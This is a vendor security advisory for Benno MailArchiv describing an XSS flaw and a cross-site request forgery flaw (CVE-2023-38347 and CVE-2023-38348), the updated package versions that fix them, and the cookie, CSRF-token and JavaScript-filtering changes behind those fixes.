Mid July 2023, two critical security vulnerabilities were discovered in Benno MailArchiv.
One problem concerns a critical XSS vulnerability (Cross Site Scripting), the other is a critical XSRF vulnerability (Cross-Site Request Forgery).

CVE numbers were assigned for the two security vulnerabilities:

  • CVE-2023-38347 (for the XSS vulnerability)
  • CVE-2023-38348 (for the XSRF vulnerability)

Solution:

Please update your Benno MailArchiv installation promptly to the latest version! By installing the packages benno-web (Version 2.10.2) and benno-rest (Version 2.10.1) the two relevant components are updated. The two critical security vulnerabilities are closed.

Important note on the update:

The update forces directly from the installation the use of HTTPS (also SSL-encrypted http) for the WebApp! 
After the update there is a Login in the Benno WebApp only via HTTPS possible!

The possibility to use the login for HTTP (unencrypted) still exists. However, this must be specifically enabled. In this article in the Benno Wiki the activation of Plaintext HTML Login is explained: https://wiki.benno-mailarchiv.de/doku.php/http_plaintext_access

WARNING – IMPORTANT:
The XSS vulnerability is only mitigated by using HTTPS effective closed!
If the installation is manually switched to Plaintext HTML Login as described, the XSS vulnerability remains effective and the server is again vulnerable to the security flaw!

Further information on the two critical security vulnerabilities:

Regarding CVE-2023-38347 (XSS-Vulnerability):
The Benno WebApp displays e‑mails in the web interface unfiltered. Before displaying HTML code, it is not examined for malicious JavaScript code etc., nor is it filtered out.
If an archived mail contains a deliberately targeted, malicious JavaScript code and this mail is displayed by a user in the Benno WebApp, the JavaScript code can access the session cookie, read it and transmit the information to the attacker. An attacker would therefore, for example, be able to exfiltrate the Benno MailArchiv access data of the affected user and thereby gain access to the mail archive (as far as reachable via the Internet). Likewise, it would be possible via this route to change the password of the logged‑in Benno WebApp user. (This attack vector is limited in time to the lifetime of the session cookie. Closing the victim’s web browser invalidates the session cookie).
In the benno-web package, cookie handling was changed by extending the HttpOnly mode and using Secure cookies. A CSRF token was added to the forms in benno-web. Through this, the web server can now determine whether the submission of a form was sent by a legitimate user via the user's browser or not. With the updated version of benno-web and benno-rest, this XSS security vulnerability is closed. Before displaying HTML‑formatted mails, JavaScript code is now removed within benno-rest.

Regarding CVE-2023-38348 (XSRF-Vulnerability):
Through the XSRF security vulnerability, an administrator can, for example, be led via a link to a prepared page and there be induced to change his password or make other settings – which can then fall into the hands of the attacker. Attackers, as a “man in the middle”, thus have the possibility to obtain credentials and other attributes set by the administrator via the WebApp.
In the benno-web package, the use of CSRF tokens has now been introduced. When a user logs in, benno-web creates such a CSRF token. This is stored in the session and expires at the end of the session. benno-web adds this CSRF token to every web form (as a hidden tag) that causes changes to a data set when submitted (e.g., change password, adjust user, etc.). If, for example, an administrator submits a change, this token is sent along and verified whether it matches the one issued in the session. “Man in the middle” attacks will therefore be effectively prevented in the future.
With the updated version of benno-web and benno-rest, this security vulnerability is closed.